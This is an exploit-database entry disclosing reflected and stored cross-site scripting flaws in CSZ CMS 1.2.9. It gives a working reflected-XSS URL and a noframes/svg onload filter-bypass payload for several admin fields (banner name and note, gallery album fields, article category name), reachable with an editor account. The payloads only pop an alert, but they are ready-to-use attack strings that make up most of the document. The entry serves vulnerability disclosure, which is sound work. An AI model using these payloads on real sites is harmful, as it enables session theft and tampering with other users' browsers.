CSZ CMS 1.2.9 - Multiple Cross-Site Scripting

Author: SunCSR
type: webapps
platform: php
port: 
date_added: 2021-01-05 
date_updated: 2021-01-05 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
<http://localhost/pluginabc%22-alert%28origin%29-%22abc>

2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">